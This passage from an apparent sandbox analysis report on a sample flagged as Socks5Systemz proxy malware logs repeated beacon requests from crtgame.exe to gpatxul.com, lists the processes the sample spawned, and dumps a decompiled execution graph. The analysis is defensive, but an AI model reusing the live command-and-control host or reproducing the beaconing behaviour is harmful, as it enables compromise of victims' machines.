                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:03:58.928916931 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:03:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549935185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:59.162739038 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:00.442317963 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.549937185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:04:00.681715965 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:01.954699993 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.549942185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:04:02.196254969 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:03.479429007 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.549948185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:04:03.725128889 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:05.047827005 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.549951185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:04:05.293818951 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:06.699769020 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.549955185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:04:06.958384991 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:08.238189936 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.549961185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:04:08.474240065 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:04:09.749092102 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:04:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:06:02:02
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Users\user\Desktop\AGcC2uK0El.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\AGcC2uK0El.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:7'280'524 bytes
                                                                                  MD5 hash:3EC3E60970E2D0D38DF3B5E571E8514D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:1
                                                                                  Start time:06:02:02
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:704'000 bytes
                                                                                  MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:06:02:04
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                                  Imagebase:0x350000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:06:02:04
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:06:02:04
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                                  Imagebase:0x400000
                                                                                  File size:2'207'670 bytes
                                                                                  MD5 hash:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                                  Imagebase:0xb20000
                                                                                  File size:47'104 bytes
                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                                  Imagebase:0x400000
                                                                                  File size:2'207'670 bytes
                                                                                  MD5 hash:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                                  Imagebase:0x8c0000
                                                                                  File size:139'776 bytes
                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:21%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:2.4%
                                                                                    Total number of Nodes:1497
                                                                                    Total number of Limit Nodes:22
                                                                                    execution_graph 4985 409c40 5026 4030dc 4985->5026 4987 409c56 5029 4042e8 4987->5029 4989 409c5b 5032 40457c GetModuleHandleA GetProcAddress 4989->5032 4995 409c6a 5049 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4995->5049 5012 409d43 5111 4074a0 5012->5111 5014 409d05 5014->5012 5144 409aa0 5014->5144 5015 409d84 5115 407a28 5015->5115 5016 409d69 5016->5015 5017 409aa0 4 API calls 5016->5017 5017->5015 5019 409da9 5125 408b08 5019->5125 5023 409def 5024 408b08 21 API calls 5023->5024 5025 409e28 5023->5025 5024->5023 5154 403094 5026->5154 5028 4030e1 GetModuleHandleA GetCommandLineA 5028->4987 5031 404323 5029->5031 5155 403154 5029->5155 5031->4989 5033 404598 5032->5033 5034 40459f GetProcAddress 5032->5034 5033->5034 5035 4045b5 GetProcAddress 5034->5035 5036 4045ae 5034->5036 5037 4045c4 SetProcessDEPPolicy 5035->5037 5038 4045c8 5035->5038 5036->5035 5037->5038 5039 4065b8 5038->5039 5168 405c98 5039->5168 5048 406604 6F541CD0 5048->4995 5050 4090f7 5049->5050 5295 406fa0 SetErrorMode 5050->5295 5055 403198 4 API calls 5056 40913c 5055->5056 5057 409b30 GetSystemInfo VirtualQuery 5056->5057 5058 409be4 5057->5058 5061 409b5a 5057->5061 5063 409768 5058->5063 5059 409bc5 VirtualQuery 5059->5058 5059->5061 5060 409b84 VirtualProtect 5060->5061 5061->5058 5061->5059 5061->5060 5062 409bb3 VirtualProtect 5061->5062 5062->5059 5305 406bd0 GetCommandLineA 5063->5305 5065 409825 5067 4031b8 4 API calls 5065->5067 5066 406c2c 6 API calls 5070 409785 5066->5070 5068 40983f 5067->5068 5071 406c2c 5068->5071 5069 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5069->5070 5070->5065 5070->5066 5070->5069 5072 406c53 GetModuleFileNameA 5071->5072 5073 406c77 GetCommandLineA 5071->5073 5074 403278 4 API calls 5072->5074 5075 406c7c 5073->5075 5076 406c75 5074->5076 5077 406c81 5075->5077 5078 406af0 4 API calls 5075->5078 5081 406c89 5075->5081 5079 406ca4 5076->5079 5080 403198 4 API calls 5077->5080 5078->5075 5082 403198 4 API calls 5079->5082 5080->5081 5083 40322c 4 API calls 5081->5083 5084 406cb9 5082->5084 5083->5079 5085 4031e8 5084->5085 5086 4031ec 5085->5086 5087 4031fc 5085->5087 5086->5087 5089 403254 4 API calls 5086->5089 5088 403228 5087->5088 5090 4025ac 4 API calls 5087->5090 5091 4074e0 5088->5091 5089->5087 5090->5088 5092 4074ea 5091->5092 5326 407576 5092->5326 5329 407578 5092->5329 5093 407516 5094 40752a 5093->5094 5332 40748c GetLastError 5093->5332 5098 409bec FindResourceA 5094->5098 5099 409c01 5098->5099 5100 409c06 SizeofResource 5098->5100 5101 409aa0 4 API calls 5099->5101 5102 409c13 5100->5102 5103 409c18 LoadResource 5100->5103 5101->5100 5104 409aa0 4 API calls 5102->5104 5105 409c26 5103->5105 5106 409c2b LockResource 5103->5106 5104->5103 5107 409aa0 4 API calls 5105->5107 5108 409c37 5106->5108 5109 409c3c 5106->5109 5107->5106 5110 409aa0 4 API calls 5108->5110 5109->5014 5141 407918 5109->5141 5110->5109 5112 4074b4 5111->5112 5113 4074c4 5112->5113 5114 4073ec 20 API calls 5112->5114 5113->5016 5114->5113 5116 407a35 5115->5116 5117 405880 4 API calls 5116->5117 5118 407a89 5116->5118 5117->5118 5119 407918 InterlockedExchange 5118->5119 5120 407a9b 5119->5120 5121 405880 4 API calls 5120->5121 5122 407ab1 5120->5122 5121->5122 5123 405880 4 API calls 5122->5123 5124 407af4 5122->5124 5123->5124 5124->5019 5129 408b82 5125->5129 5133 408b39 5125->5133 5126 408bcd 5440 407cb8 5126->5440 5128 408be4 5132 4031b8 4 API calls 5128->5132 5129->5126 5131 4034f0 4 API calls 5129->5131 5137 4031e8 4 API calls 5129->5137 5138 403420 4 API calls 5129->5138 5140 407cb8 21 API calls 5129->5140 5131->5129 5135 408bfe 5132->5135 5133->5129 5134 4031e8 4 API calls 5133->5134 5136 403420 4 API calls 5133->5136 5139 407cb8 21 API calls 5133->5139 5431 4034f0 5133->5431 5134->5133 5151 404c10 5135->5151 5136->5133 5137->5129 5138->5129 5139->5133 5140->5129 5466 4078c4 5141->5466 5145 409ac1 5144->5145 5146 409aa9 5144->5146 5147 405880 4 API calls 5145->5147 5148 405880 4 API calls 5146->5148 5150 409ad2 5147->5150 5149 409abb 5148->5149 5149->5012 5150->5012 5152 402594 4 API calls 5151->5152 5153 404c1b 5152->5153 5153->5023 5154->5028 5156 403164 5155->5156 5157 40318c TlsGetValue 5155->5157 5156->5031 5158 403196 5157->5158 5159 40316f 5157->5159 5158->5031 5163 40310c 5159->5163 5161 403174 TlsGetValue 5162 403184 5161->5162 5162->5031 5164 403120 LocalAlloc 5163->5164 5165 403116 5163->5165 5166 40313e TlsSetValue 5164->5166 5167 403132 5164->5167 5165->5164 5166->5167 5167->5161 5240 405930 5168->5240 5171 405270 GetSystemDefaultLCID 5175 4052a6 5171->5175 5172 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5172->5175 5173 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5173->5175 5174 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5174->5175 5175->5172 5175->5173 5175->5174 5179 405308 5175->5179 5176 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5176->5179 5177 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5177->5179 5178 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5178->5179 5179->5176 5179->5177 5179->5178 5180 40538b 5179->5180 5273 4031b8 5180->5273 5183 4053b4 GetSystemDefaultLCID 5277 4051fc GetLocaleInfoA 5183->5277 5186 4031e8 4 API calls 5187 4053f4 5186->5187 5188 4051fc 5 API calls 5187->5188 5189 405409 5188->5189 5190 4051fc 5 API calls 5189->5190 5191 40542d 5190->5191 5283 405248 GetLocaleInfoA 5191->5283 5194 405248 GetLocaleInfoA 5195 40545d 5194->5195 5196 4051fc 5 API calls 5195->5196 5197 405477 5196->5197 5198 405248 GetLocaleInfoA 5197->5198 5199 405494 5198->5199 5200 4051fc 5 API calls 5199->5200 5201 4054ae 5200->5201 5202 4031e8 4 API calls 5201->5202 5203 4054bb 5202->5203 5204 4051fc 5 API calls 5203->5204 5205 4054d0 5204->5205 5206 4031e8 4 API calls 5205->5206 5207 4054dd 5206->5207 5208 405248 GetLocaleInfoA 5207->5208 5209 4054eb 5208->5209 5210 4051fc 5 API calls 5209->5210 5211 405505 5210->5211 5212 4031e8 4 API calls 5211->5212 5213 405512 5212->5213 5214 4051fc 5 API calls 5213->5214 5215 405527 5214->5215 5216 4031e8 4 API calls 5215->5216 5217 405534 5216->5217 5218 4051fc 5 API calls 5217->5218 5219 405549 5218->5219 5220 405566 5219->5220 5221 405557 5219->5221 5223 40322c 4 API calls 5220->5223 5291 40322c 5221->5291 5224 405564 5223->5224 5225 4051fc 5 API calls 5224->5225 5226 405588 5225->5226 5227 4055a5 5226->5227 5228 405596 5226->5228 5230 403198 4 API calls 5227->5230 5229 40322c 4 API calls 5228->5229 5231 4055a3 5229->5231 5230->5231 5285 4033b4 5231->5285 5233 4055c7 5234 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5233->5234 5235 4055e1 5234->5235 5236 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5235->5236 5237 4055fb 5236->5237 5238 405ce4 GetVersionExA 5237->5238 5239 405cfb 5238->5239 5239->5048 5241 40593c 5240->5241 5248 404ccc LoadStringA 5241->5248 5244 4031e8 4 API calls 5245 40596d 5244->5245 5251 403198 5245->5251 5255 403278 5248->5255 5252 4031b7 5251->5252 5253 40319e 5251->5253 5252->5171 5253->5252 5269 4025ac 5253->5269 5260 403254 5255->5260 5257 403288 5258 403198 4 API calls 5257->5258 5259 4032a0 5258->5259 5259->5244 5261 403274 5260->5261 5262 403258 5260->5262 5261->5257 5265 402594 5262->5265 5266 402598 5265->5266 5268 4025a2 5265->5268 5267 403154 4 API calls 5266->5267 5266->5268 5267->5268 5268->5257 5270 4025ba 5269->5270 5271 4025b0 5269->5271 5270->5252 5270->5270 5271->5270 5272 403154 4 API calls 5271->5272 5272->5270 5275 4031be 5273->5275 5274 4031e3 5274->5183 5275->5274 5276 4025ac 4 API calls 5275->5276 5276->5275 5278 405223 5277->5278 5279 405235 5277->5279 5281 403278 4 API calls 5278->5281 5280 40322c 4 API calls 5279->5280 5282 405233 5280->5282 5281->5282 5282->5186 5284 405264 5283->5284 5284->5194 5286 4033bc 5285->5286 5287 403254 4 API calls 5286->5287 5288 4033cf 5287->5288 5289 4031e8 4 API calls 5288->5289 5290 4033f7 5289->5290 5293 403230 5291->5293 5292 403252 5292->5224 5293->5292 5294 4025ac 4 API calls 5293->5294 5294->5292 5303 403414 5295->5303 5298 406fee 5299 407284 FormatMessageA 5298->5299 5300 4072aa 5299->5300 5301 403278 4 API calls 5300->5301 5302 4072c7 5301->5302 5302->5055 5304 403418 LoadLibraryA 5303->5304 5304->5298 5312 406af0 5305->5312 5307 406bf3 5308 406c05 5307->5308 5309 406af0 4 API calls 5307->5309 5310 403198 4 API calls 5308->5310 5309->5307 5311 406c1a 5310->5311 5311->5070 5313 406b1c 5312->5313 5314 403278 4 API calls 5313->5314 5315 406b29 5314->5315 5322 403420 5315->5322 5317 406b31 5318 4031e8 4 API calls 5317->5318 5319 406b49 5318->5319 5320 403198 4 API calls 5319->5320 5321 406b6b 5320->5321 5321->5307 5323 403426 5322->5323 5325 403437 5322->5325 5324 403254 4 API calls 5323->5324 5323->5325 5324->5325 5325->5317 5327 407578 5326->5327 5328 4075b7 CreateFileA 5327->5328 5328->5093 5330 403414 5329->5330 5331 4075b7 CreateFileA 5330->5331 5331->5093 5335 4073ec 5332->5335 5336 407284 5 API calls 5335->5336 5337 407414 5336->5337 5338 407434 5337->5338 5344 405184 5337->5344 5347 405880 5338->5347 5341 407443 5342 403198 4 API calls 5341->5342 5343 407460 5342->5343 5343->5094 5351 405198 5344->5351 5348 405887 5347->5348 5349 4031e8 4 API calls 5348->5349 5350 40589f 5349->5350 5350->5341 5352 4051b5 5351->5352 5359 404e48 5352->5359 5355 4051e1 5357 403278 4 API calls 5355->5357 5358 405193 5357->5358 5358->5338 5362 404e63 5359->5362 5360 404e75 5360->5355 5364 404bd4 5360->5364 5362->5360 5367 404f6a 5362->5367 5374 404e3c 5362->5374 5365 405930 5 API calls 5364->5365 5366 404be5 5365->5366 5366->5355 5368 404f7b 5367->5368 5371 404fc9 5367->5371 5370 40504f 5368->5370 5368->5371 5373 404fe7 5370->5373 5381 404e28 5370->5381 5371->5373 5377 404de4 5371->5377 5373->5362 5375 403198 4 API calls 5374->5375 5376 404e46 5375->5376 5376->5362 5378 404df2 5377->5378 5384 404bec 5378->5384 5380 404e20 5380->5371 5397 4039a4 5381->5397 5387 4059a0 5384->5387 5386 404c05 5386->5380 5388 4059ae 5387->5388 5389 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5388->5389 5390 4059d8 5389->5390 5391 405184 19 API calls 5390->5391 5392 4059e6 5391->5392 5393 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5392->5393 5394 4059f1 5393->5394 5395 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5394->5395 5396 405a0b 5395->5396 5396->5386 5398 4039ab 5397->5398 5403 4038b4 5398->5403 5400 4039cb 5401 403198 4 API calls 5400->5401 5402 4039d2 5401->5402 5402->5373 5404 4038d5 5403->5404 5405 4038c8 5403->5405 5407 403934 5404->5407 5408 4038db 5404->5408 5406 403780 6 API calls 5405->5406 5411 4038d0 5406->5411 5409 403993 5407->5409 5410 40393b 5407->5410 5412 4038e1 5408->5412 5413 4038ee 5408->5413 5415 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5409->5415 5416 403941 5410->5416 5417 40394b 5410->5417 5411->5400 5418 403894 6 API calls 5412->5418 5414 403894 6 API calls 5413->5414 5419 4038fc 5414->5419 5415->5411 5420 403864 9 API calls 5416->5420 5421 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5417->5421 5418->5411 5423 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5419->5423 5420->5411 5422 40395d 5421->5422 5424 403864 9 API calls 5422->5424 5425 403917 5423->5425 5426 403976 5424->5426 5427 40374c VariantClear 5425->5427 5428 40374c VariantClear 5426->5428 5429 40392c 5427->5429 5430 40398b 5428->5430 5429->5400 5430->5400 5432 4034fd 5431->5432 5438 40352d 5431->5438 5434 403526 5432->5434 5436 403509 5432->5436 5433 403198 4 API calls 5439 403517 5433->5439 5435 403254 4 API calls 5434->5435 5435->5438 5446 4025c4 5436->5446 5438->5433 5439->5133 5441 407cd3 5440->5441 5442 407cc8 5440->5442 5450 407c5c 5441->5450 5442->5128 5445 405880 4 API calls 5445->5442 5447 4025ca 5446->5447 5448 4025dc 5447->5448 5449 403154 4 API calls 5447->5449 5448->5439 5448->5448 5449->5448 5451 407c70 5450->5451 5452 407caf 5450->5452 5451->5452 5454 407bac 5451->5454 5452->5442 5452->5445 5455 407bb7 5454->5455 5456 407bc8 5454->5456 5458 405880 4 API calls 5455->5458 5457 4074a0 20 API calls 5456->5457 5459 407bdc 5457->5459 5458->5456 5460 4074a0 20 API calls 5459->5460 5461 407bfd 5460->5461 5462 407918 InterlockedExchange 5461->5462 5463 407c12 5462->5463 5464 407c28 5463->5464 5465 405880 4 API calls 5463->5465 5464->5451 5465->5464 5467 4078d6 5466->5467 5468 4078e7 5466->5468 5469 4078db InterlockedExchange 5467->5469 5468->5014 5469->5468 6242 409e47 6243 409e6c 6242->6243 6244 4098f4 15 API calls 6243->6244 6247 409e71 6244->6247 6245 409ec4 6276 4026c4 GetSystemTime 6245->6276 6247->6245 6251 408dd8 4 API calls 6247->6251 6248 409ec9 6249 409330 32 API calls 6248->6249 6250 409ed1 6249->6250 6252 4031e8 4 API calls 6250->6252 6253 409ea0 6251->6253 6254 409ede 6252->6254 6256 409ea8 MessageBoxA 6253->6256 6255 406928 5 API calls 6254->6255 6257 409eeb 6255->6257 6256->6245 6258 409eb5 6256->6258 6259 4066c0 5 API calls 6257->6259 